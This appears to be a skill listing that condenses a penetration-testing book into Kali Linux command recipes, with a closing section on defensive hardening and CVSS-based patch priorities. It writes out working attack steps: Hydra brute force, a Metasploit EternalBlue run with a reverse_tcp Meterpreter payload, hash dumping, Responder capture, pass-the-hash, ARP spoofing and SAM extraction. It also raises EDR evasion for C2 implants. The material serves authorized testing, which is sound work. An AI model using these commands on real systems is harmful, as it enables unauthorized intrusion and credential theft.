Hacking & Security

Hacking & Security: The Comprehensive Guide to Penetration Testing and Cybersecurity · Michael Kofler et al ·800 pages

Comprehensive pentesting reference covering Kali Linux toolchain (nmap/hydra/Wireshark/Burp/Metasploit/Empire/Sliver), offline attacks (physical access, BitLocker/LUKS, password reset), web testing (Juice Shop, OWASP methodology), network attacks (ARP poisoning, Responder, pass-the-hash), and defensive hardening (10 steps, CVSS prioritization).

Capabilities (8)

› Run systematic recon: nmap, dnsrecon, whois, sslyze
› Execute credential attacks: Hydra (online), Hashcat/John (offline), wordlist generation with CeWL
› Operate Metasploit: search/use/set/run exploits, Meterpreter post-exploitation commands
› Use Empire and Sliver C2 frameworks for agent deployment and post-exploitation
› Perform physical offline attacks: boot Kali, mount NTFS, extract/reset Windows credentials
› Run ARP spoofing + Responder for NetNTLM capture, crack with Hashcat
› Use Burp Suite: Proxy, Intruder, Scanner, Repeater for web app testing
› Apply CVSS scoring to prioritize vulnerability patching

How to use

Install this skill and Claude can guide an operator through the full Kali Linux toolchain for structured authorized pentests — from nmap service discovery and custom CeWL wordlist generation through Metasploit exploitation, C2 framework comparison, network MITM setup, and CVSS-based finding prioritization for client reports

Why it matters

Authorized penetration testers need to move fluidly across network, credential, web, and physical attack surfaces in a single engagement — this comprehensive reference ensures full coverage of the Kali toolchain while the CVSS prioritization framework translates raw findings into actionable remediation timelines for clients

Example use cases

› Generating a custom wordlist from a target company's website with CeWL and running it against captured NTLM hashes from a Responder session using Hashcat with best64 rules
› Evaluating whether Sliver over mTLS or Koadic over COM provides better EDR evasion for an engagement where the target runs CrowdStrike Falcon, then outlining implant deployment steps
› Booting a Kali USB on a locked Windows workstation, mounting the NTFS volume, and extracting credential hashes from the SAM hive for offline cracking during a physical security assessment

Hacking & Security Skill

Core Toolchain

Reconnaissance

# Network discovery
nmap -sn 192.168.1.0/24              # ping sweep
nmap -sV -sC -p- target             # service/version scan + default scripts
nmap --script vuln target            # vulnerability scan

# DNS recon
dig target.com ANY
dnsrecon -d target.com -t axfr       # zone transfer attempt
whois target.com

# SSL/TLS assessment
sslyze target.com:443                # certificate + cipher analysis
testssl target.com                   # comprehensive TLS test

Credential Attacks

# Hydra brute force
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://target
hydra -L users.txt -P passwords.txt http-post-form \
  "/login:username=^USER^&password=^PASS^:Invalid"

# Password cracking (offline)
hashcat -m 0 hashes.txt rockyou.txt            # MD5
hashcat -m 1000 hashes.txt rockyou.txt         # NTLM
hashcat -m 1800 hashes.txt rockyou.txt         # sha512crypt (Linux)
john --wordlist=rockyou.txt hashes.txt

Traffic Analysis

# Wireshark / tcpdump
tcpdump -i eth0 -w capture.pcap
tcpdump -r capture.pcap 'tcp port 80'
ngrep -W byline 'password|pass' port 80        # keyword search in traffic

Metasploit Framework

Workflow

msfconsole
search type:exploit name:eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.10
run

Meterpreter Post-Exploitation

meterpreter> getuid              # current user
meterpreter> getsystem           # attempt privilege escalation
meterpreter> hashdump            # dump NTLM hashes
meterpreter> run post/multi/recon/local_exploit_suggester
meterpreter> run post/windows/gather/credentials/credential_collector
meterpreter> portfwd add -l 3389 -p 3389 -r internal_host  # port forward
meterpreter> upload/download file
meterpreter> shell               # drop to OS shell

C2 Frameworks

Empire Framework

Listeners: HTTP/S, WMI — receive connections from agents
Stagers: PowerShell, Python, BAT — executed on victim to install agent
Modules: recon, credentials, lateral movement, persistence

(Empire) > listeners
(Empire) > uselistener http
(Empire) > usestager windows/launcher_bat
set Listener http
execute

Sliver (Modern C2)

Written in Go; generates implants for Windows/Linux/macOS
Supports HTTP/S, DNS, mutual TLS communication channels
Built-in pivoting, port forwarding, process injection

Koadic (COM-based, JScript/VBScript)

Uses Windows COM objects as implant — blends with normal Windows behavior
LOLBins (Living Off the Land): cscript, wscript, mshta

Offline Attacks

Physical Access

Boot from Kali USB in live mode
Mount Windows NTFS: ntfs-3g /dev/sdb1 /mnt/windows
Extract credentials: SAM + SYSTEM → impacket-secretsdump
Reset Windows password: chntpw -u Administrator SAM

Encrypted Disk (BitLocker/LUKS)

BitLocker: requires recovery key or TPM bypass — often stored in AD
LUKS: cryptsetup luksDump /dev/sda1 shows hash parameters for offline attack
dislocker: mount BitLocker volumes on Linux

Web Application Testing

OWASP Juice Shop Methodology (progressive disclosure)

Reconnaissance: robots.txt, sitemap.xml, JS source, API endpoints
Auth testing: default credentials, SQL injection in login, JWT attacks
Injection: SQLi, XSS, XXE in file uploads, SSTI
Broken access control: IDOR (change IDs in requests), privilege escalation via API

Burp Suite Workflow

1. Proxy: intercept + modify requests
2. Spider/Crawler: map all endpoints
3. Scanner: automated vulnerability detection
4. Intruder: systematic fuzzing (payloads → positions)
5. Repeater: manual testing of individual requests
6. Extensions: additional functionality (SQLMap, JSON decoder)

Network Attacks

ARP Spoofing + MITM

# Enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
# Poison both directions:
arpspoof -i eth0 -t victim gateway
arpspoof -i eth0 -t gateway victim
# Capture traffic with Wireshark on eth0

SMB/Windows Credential Attacks

# Responder: capture NetNTLM hashes from LLMNR/NBT-NS
responder -I eth0 -wrf
# Crack captured hashes:
hashcat -m 5600 netntlm_hashes.txt rockyou.txt
# Pass-the-hash:
impacket-psexec DOMAIN/user@target -hashes :ntlm_hash

Password Attack Strategies

Rainbow Tables

Precomputed hash → plaintext tables. Effective against unsalted hashes:

rcracki_mt -h [hash] -t /path/to/tables

Defense: always salt passwords (bcrypt, scrypt, Argon2id include automatic salting).

Wordlist Construction

# CeWL: spider target website for custom wordlist
cewl -d 3 -w target_words.txt https://target.com
# Hashcat rules expand wordlists (l33t substitutions, capitalization):
hashcat -m 1000 hashes.txt wordlist.txt -r /usr/share/hashcat/rules/best64.rule

Security Hardening (Defensive)

Ten Steps to Greater Safety

Patch management: automated updates, especially for internet-facing services
Network segmentation: VLAN, firewall rules, least privilege
Credential hygiene: password manager, MFA, no password reuse
Logging and monitoring: SIEM, alerting on anomalies
Principle of least privilege: no local admin rights for standard users
Endpoint protection: EDR, application whitelisting
Email security: SPF + DKIM + DMARC, anti-phishing training
Web filtering: proxy with SSL inspection for outbound
Incident response plan: defined roles, communication plan, practiced
Regular pentesting: validate controls, find gaps before attackers

CVSS Scoring (for prioritizing vulnerabilities)

Score 0-3.9: Low → patch in next maintenance window
Score 4.0-6.9: Medium → patch within 30 days
Score 7.0-8.9: High → patch within 7 days
Score 9.0-10.0: Critical → emergency patch immediately